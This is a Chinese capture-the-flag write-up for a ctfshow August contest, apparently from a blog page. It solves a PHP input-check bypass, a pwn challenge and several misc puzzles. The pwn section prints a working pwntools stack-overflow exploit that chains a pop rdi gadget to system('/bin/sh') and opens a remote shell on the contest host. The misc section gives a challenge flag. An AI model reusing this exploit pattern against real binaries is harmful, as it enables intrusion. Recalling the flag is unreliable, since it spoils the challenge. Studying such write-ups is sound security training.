ctfshow吃瓜杯 八月群赛 WriteUp/WP
Web:
shellme
题目问题,没什么说的,进去直接搜ctfshow就是flag
热身
签到题,做过web入门的都应该知道怎么绕,分开来看
比如第一个部分可以用小数绕过,第二部分没有字母,可以用8进制绕过。
所以目前得到的payload是
num=010574
但是第三部分还要看0是不是出现在首位,这里就可以用+号,来凑个数
最终payload
num=+010574
PWN
wuqian
只会最简单的,别骂了
就一个栈溢出,找到rdi、system、/bin/sh的地址就行了
from pwn import *
p = remote("pwn.challenge.ctf.show","28125")
#p = process("./pwn")
binsh = 0x601040
system_addr = 0x400490
rdi_addr = 0x400663
p.recv()
payload = 'a'*(0x10+8) + p64(rdi_addr) + p64(binsh) + p64(system_addr)
p.sendline(payload)
p.interactive()
MISC
Misc游戏签到
玩就行了,出bug我也不清楚
ctfshow{White_give_game_only_waste_your_timehahaha}
She Never Owns a Window
看起来很像SNOW,但事实却证明不能用SNOW.EXE解出来。
去请教了一下,就给我说了三句话
1.不是SNOW
2.不需要转换字符
3.有轮子
虽然说了这些,但是我不理解。
只知道是空白的字符,winhex能看出来只含有空格,制表符,换行符
然后就去八神
ctfshow吃瓜杯 八月群赛 WriteUp/WP相关推荐
- ctfshow 吃瓜杯八月赛 Misc WriteUp
目录 1.Misc游戏签到 2.吃瓜 3.EZbingo 4.魔王 5.Dinner of Cyanogen 6.Music Game 7.一群强盗 1.Misc游戏签到 别问 问就是玩游戏 套神说的 ...
- ctfshow 吃瓜杯 web 部分题
目录 热身 shellme shellme_Revenge 热身 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020 ...
- CTFshow吃瓜杯的两道web
Shellme_Revenge 在BsidesCTF2021中出过类似的题,利用的是一些数学上的trick 首先是注意到cookie中的hint,所以在请求中加上?looklook=1即可看到源码: ...
- ctfshow吃瓜杯之web(除魔女)详解
shellme 搜索ctfshow即可 热身 <?phpinclude("flag.php"); highlight_file(__FILE__); if(isset($_G ...
- ctfshow吃瓜杯 web
文章目录 热身 ATTup 代码审计 phar反序列化 shellme shellme_Revenge 热身 <?php/* # -*- coding: utf-8 -*- # @Author: ...
- “蚁景杯”WUSTCTF2021新生赛writeup
"蚁景杯"WUSTCTF2021新生赛writeup Crypto 签到 滴答 AES With RSA GMC Vigenere give you d 银河信号 Misc Erx ...
- [ctf.show.reverse] 吃瓜杯 签层饼,Tea_tube_pot
签层饼 真有一千层函数呀,沿着输入存入的两个变量找,找到3个函数: 主函数给出了flag的组织方式, check1说number2<882408, check2说number1 = number ...
- [CTFshow]吃鸡杯
在?看看密码 给了一个vmem文件,内存取证 搞密码肯定一开始想到系统用户的密码 volatility --profile=Win7SP1x64 -f looklookpassword.vmem hi ...
- [CTF]公司“DSFM-圣诞狂欢”杯安全技能赛writeup
1. Hello everyone 2048的小游戏,不用真正打通关,直接F12即可. 2. 数论 s=m*p%q,要求出m,就可以得到flag. python脚本: p = int('0x9dfe6 ...
最新文章
- [JavaScript] JavaScript 值类型使用:与数组有关的API
- Android NDK 导出独立工具链
- HttpClient 设置不当引发的一次雪崩!
- [20150611]优化sql遇到问题.txt
- 西门子dcs系统组态手册下载_西门子PLC,PCS7系统介绍
- 得到多组单选框的值_多组学如何构建预后预测模型,还发了7分+?
- 软件公司产品营销大数据分析(下)
- 如何通过系统信息查看 Mac 上的显示刷新率?
- 课程设计:基于C52单片机的循迹小车
- ITF Demo代码(用VBScript构建的接口测试框架)
- Abel逆变换的MATLAB实现(未完成版)
- java.lang.IllegalArgumentException: Mapped Statements collection already contains value for ...
- Python编曲实践(九):如何计算并估计音乐的调性(大/小调+主音)?Krumhansl-Schmuckler调性分析算法的原理与实现
- eval()与train()(结合源码理解)
- Python自动化测试详解
- k8s资源之pvpvcsc
- ST-link驱动下载、安装、配置和升级
- loss scale的理解
- 漫画 | 悲催的中国式软件开发
- javascript 中innerHTML的用法
热门文章
- 中国oracle ocm,【Oracle 10g OCM 巅峰之战】
- java 不能实例化类型_java不能实例化类型
- java编写中显示内部外部,jdk安装好后在cmd上输入java正常,输入javac就显示不是内部外部命令...
- Microsoft.Office.Interop.Word 在某一段落前插入新的段落
- 计算机专业毕业论文java毕业设计网站SSH人事管理系统|人力请假考勤工资人事奖惩[包运行成功]
- 1.设计一个抽奖程序,程序通过随机方式产生中奖序号。程序可以设置序号包含数字位数 和最大序号,一次抽取几个中奖序号(最少 1 个序号,最多不超过 2 个序号)和总共中奖 人数(最少 5 人)。抽奖过程
- java nextval_kmp算法中的nextval实例解释
- 2022「Cloud 100 China」榜单隆重发布,百望云荣誉登榜
- 农村包围城市的『快手』
- python写采集程序_用python写的一个wordpress的采集程序